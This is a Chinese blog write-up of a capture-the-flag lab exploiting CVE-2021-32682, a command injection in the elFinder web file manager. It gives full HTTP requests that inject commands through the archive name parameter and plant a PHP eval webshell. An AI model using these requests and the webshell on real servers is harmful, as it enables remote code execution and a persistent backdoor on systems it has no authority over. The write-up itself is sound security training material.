[春秋云镜]CVE-2021-32682

已于 2022-12-05 21:26:20 修改
阅读量4.6k 收藏 3
点赞数 1
分类专栏: 春秋云镜 靶场 文章标签: web安全 安全
于 2022-12-05 21:24:37 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/niubi707/article/details/128192338
版权

声明:⽂中所涉及的技术、思路和⼯具仅供以安全为⽬的的学习交流使⽤,任何⼈不得将其⽤于⾮法⽤途以及盈利等⽬的,否则后果⾃⾏承担。所有渗透都需获取授权!


靶场介绍

elFinder 是一个开源的 web 文件管理器,使用 jQuery UI 用 Ja​vaScript 编写。Creation 的灵感来自于 Mac OS X 操作系统中使用的 Finder 程序的简单性和便利性。 其低版本中存在命令注入

春秋云镜开启靶场:

http://eci-2zej5qhqolmn9pwfipad.cloudeci1.ichunqiu.com/

 

点击elfinder.html

上传1.txt  1.txt内容为空

创建压缩包 命名为2.zip

 

 POC

GET /php/connector.minimal.php?cmd=archive&name=-TvTT=id>shell.php%20%23%20a.zip&target=l1_Lw&targets%5B1%5D=l1_Mi56aXA&targets%5B0%5D=l1_MS50eHQ&type=application%2Fzip HTTP/1.1
Host: eci-2zej5qhqolmn9pwfipad.cloudeci1.ichunqiu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: Hm_lvt_2d0601bd28de7d49818249cf35d95943=1670068031,1670127405,1670217594,1670236837; Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1670242506; PHPSESSID=lra53ti9bs3e8g387k3fupjjg0
Upgrade-Insecure-Requests: 1

 TvTT=id>shell.php执行的命令

 访问/files/shell.php 获取命令执行结果

 http://eci-2zej5qhqolmn9pwfipad.cloudeci1.ichunqiu.com/files/shell.php

 写入shell

GET /php/connector.minimal.php?cmd=archive&name=-TvTT=echo%20%27%3C%3Fphp%20%40eval%28%24_POST%5B%27caidao%27%5D%29%3B%3F%3E%27>shell3.php%20%23%20a.zip&target=l1_Lw&targets%5B1%5D=l1_Mi56aXA&targets%5B0%5D=l1_MS50eHQ&type=application%2Fzip HTTP/1.1
Host: eci-2zej5qhqolmn9pwfipad.cloudeci1.ichunqiu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: Hm_lvt_2d0601bd28de7d49818249cf35d95943=1670068031,1670127405,1670217594,1670236837; Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1670242506; PHPSESSID=lra53ti9bs3e8g387k3fupjjg0
Upgrade-Insecure-Requests: 1

echo '<?php @eval($_POST['caidao']);?>' 进行url编码

echo%20%27%3C%3Fphp%20%40eval%28%24_POST%5B%27caidao%27%5D%29%3B%3F%3E%27

 

 webshell地址

http://eci-2zej5qhqolmn9pwfipad.cloudeci1.ichunqiu.com/files/shell3.php

成功获取flag

春天11-
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
安全漏洞】CVE-2021-32682 elFinder RCE 简单分析
HBohan的博客
01-07 2784
elFinder 是一个开源的 web 文件管理器,使用 jQuery UI 用 Ja​​vaScript 编写。Creation 的灵感来自于 Mac OS X 操作系统中使用的 Finder 程序的简单性和便利性。
春秋云镜 CVE-2021-32682
qq_22002773的博客
08-01 163
春秋云镜 CVE-2021-32682
CVE-2021-32682 elFinder ZIP 参数与任意命令注入漏洞复现
ierciyuan的博客
08-02 2481
CVE-2021-32682 elFinder ZIP 参数与任意命令注入漏洞复现。源码包+追踪分析。
elfinder 命令注入 (CVE-2021-32682) 漏洞复现分析 | snort规则
weixin_68999845的博客
08-23 959
这个标志组合的意思是,在创建或更新 ZIP 归档时,会先添加文件到归档中,然后立即运行测试来验证归档的完整性,并且在执行过程中显示详细信息,\1. 复现过程:https://www.cnblogs.com/NoCirc1e/p/16275613.html。下载地址:https://github.com/Studio-42/elFinder,下载完成后,重命名。\2. 源码下载url:https://github.com/Studio-42/elFinder。
elfinder 命令注入 (CVE-2021-32682)
m0_65150886的博客
12-29 432
6.虽然这个数据包发送后会返回错误信息,但实际上其中指定的命令已经被成功执行,可以访问http://ip:port/files/shell.php查看执行的结果。该漏洞源于,在创建新的zip存档时,没有对name参数进行严格的过滤,导致参数被带入prox_open中执行,造成命令注入。3.右键这个文件,对其进行打包,打包后的文件命名为2.zip。4.对2.zip进行打包,命名为3.zip,同时进行抓包。2.创建一个普通的文本文件1.txt。及时更新到新版本2.1.49及以上。1.访问ip:port。
春秋云境 CVE-2022-4230 夺旗
05-02
### 春秋云境 CVE-2022-4230 夺旗知识点解析 #### 一、漏洞概述 **CVE-2022-4230** 是一个存在于 **WP Statistics** WordPress 插件(版本13.2.9及以前)中的安全漏洞。该漏洞的主要原因是插件在处理特定参数时...
CVE-2021-21315漏洞复现-kali2020.4
weixin_43867542的博客
07-19 1355
漏洞名称:systeminformation 操作系统命令注入漏洞 等级危害:高危 CVSS评分:7.8 漏洞类型:操作系统命令注入 漏洞概述 systeminformation中存在操作系统命令注入漏洞,该漏洞源于外部输入数据构造操作系统可执行命令过程中,网络系统或产品未正确过滤其中的特殊字符、命令等。攻击者可利用该漏洞执行非法操作系统命令。 受影响版本 systeminformation < 5.3.1 环境概述 kali2020.4 漏洞复现 1.准备工作 ...
春秋云镜CVE-2022-0543
09-04
根据提供的引用内容,春秋云镜CVE-2022-0543指的是Apache Spark的命令注入漏洞(CVE-2022-33891)。这个漏洞影响的版本包括Apache Spark version 3.1.1和Apache Spark version >= 3.3.0。 官方建议升级到安全版本来...
春秋云镜CVE-2022-30887
09-05
春秋云镜CVE-2022-30887是指Pharmacy Management System文件上传漏洞,该漏洞的CVE编号为CVE-2022-30887。此漏洞可能允许攻击者通过上传恶意文件利用系统中的漏洞。请注意,由于未提供更多信息,我无法提供详细的...
春秋云镜CVE-2022-24112
最新发布
08-21
春秋云镜CVE-2022-24112是一个安全漏洞的编号,全称为“Cross-Site Scripting (XSS)”,它通常发生在网站存在输入验证不足的情况下。攻击者通过恶意脚本注入到用户的请求中,当这些脚本被服务器作为有效内容返回给...
elFinder(Web文件管理器)
08-17
elFinder是Web开源的文件管理器,用JavaScript写的usingjquery UI。创作灵感来自简单和Finder programused在Mac OS X操作系统方便。所有的操作与远程服务器上的文件和文件夹(复制,移动,上传,创建文件夹/文件,重命名等)
elFinder ZIP 参数注入导致命令注入 (CVE-2021-32682
weixin_56537388的博客
11-28 437
elFinder 是一个用于 Web 的开源文件管理器,使用 jQuery UI 用 JavaScript 编写。在 elFinder 2.1.48 及更早版本中发现一个参数注入漏洞。此漏洞可能允许攻击者在托管 elFinder PHP 连接器的服务器上执行任意命令,即使配置最少也是如此。这些问题已在版本 2.1.59 中修补。解决方法是,确保连接器不会在未经身份验证的情况下公开。
CVE-2021-26084——Confluence OGNL 注入漏洞分析
战神/calmness的博客
09-04 2272
简述 2021年08月26日,Atlassian官方发布了Confluence OGNL 注入漏洞的风险通告,漏洞编号为CVE-2021-26084,漏洞等级:严重,漏洞评分:8.8。目前该漏洞安全补丁已更新。 Confluence是Atlassian公司的一个专业的企业知识管理与协同软件,也可以用于构建企业wiki,因此,Confluence的使用面很广。在某些情况下,未授权的攻击者可以构造特殊的请求,造成远程代码执行。 影响版本 组件
Windows本地提权漏洞(CVE-2021-1732)复现
玄道的网安博客
04-13 2172
漏洞概述 该漏洞由函数win32kfull!xxxCreateWi ndowEx 对应用层回调返回数据校验不严导致,本地用户执行漏洞利用程序获取系统权限。 影响版本 Windows Server, version 20H2 (Server Core Installation) Windows 10 Version 20H2 for ARM64-based Systems Windows 10 Version 20H2 for 32-bit Systems Windows 10 Versi..
CVE-2021-27928漏洞复现
wuuconix's blog
05-20 4173
CVE-2021-27928漏洞复现 漏洞简介:它是一个MariaDB的远程命令执行漏洞,存在于10.2.37之前的10.2版本,10.3.28之前的10.3版本,10.4.18之前的10.4版本以及10.5.9之前的10.5版本。 复现环境 攻击机:Ubuntu 20.04.2 LTS 目标机:mariadb/server:10.3.13 docker容器 复现准备 我们需要在我们的攻击机上安装 metasploit-framework 框架。安装步骤见Nightly Installers
Apache Druid (CVE-2021-25646)远程代码执行漏洞复现
ximo的博客
04-27 792
漏洞概述 Apache Druid 是用Java编写的面向列的开源分布式数据存储,旨在快速获取大量事件数据,并在数据之上提供低延迟查询。 Apache Druid 默认情况下缺乏授权认证,攻击者可以发送特制请求,利用Druid服务器上进程的特权执行任意代码。 Apache Druid包括执行用户提供的JavaScript的功能嵌入在各种类型请求中的代码。此功能在用于高信任度环境中,默认已被禁用。但是,在Druid 0.20.0及更低版本中,经过身份验证的用户发送恶意请求,利用Apache Druid漏洞可以
Windows Print Spooler服务最新漏洞CVE-2021-34527详细分析
热门推荐
爱国小白帽
07-09 1万+
0x00 前言 近日,有安全研究员在github上公开了"CVE-2021-1675"的exp PrintNightmare,后经验证公开的exp是一个与CVE-2021-1675不同的漏洞,微软为其分配了新的编号CVE-2021-34527。这篇文章记录了CVE-2021-34527的复现过程,并对漏洞成因进行了简单的分析。 0x01 漏洞复现 这里记录域控环境下使用普通权限域账户实现RCE反弹nt authority\system shell的过程。下面的漏洞复现和漏洞分析都是基..
web安全】DolphinPHP RCE漏洞分析
HBohan的博客
04-07 3886
DolphinPHP DolphinPHP(海豚PHP)是一个基于ThinkPHP5.1.41LTS开发的一套开源PHP快速开发框架,DolphinPHP秉承极简、极速、极致的开发理念,为开发集成了基于数据-角色的权限管理机制,集成多种灵活快速构建工具,可方便快速扩展的模块、插件、钩子、数据包。统一了模块、插件、钩子、数据包之间的版本和依赖关系,进一步降低了代码和数据的冗余,以方便开发者快速构建自己的应用。 漏洞分析 看到application\common.php#action_log函数 观察到有
[春秋云镜] CVE-2022-32991 靶场详解
weixin_60374959的博客
11-23 2355
本次靶场主要考察的是对sql注入的用法,运用了一些sqlmap的参数对安全机制的绕过。-p 指定注入的参数--batch 使用默认方法去执行sql注入--random-agent 随机更换请求头--user-agent 使用指定的请求头--cookie 使用指定cookie。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值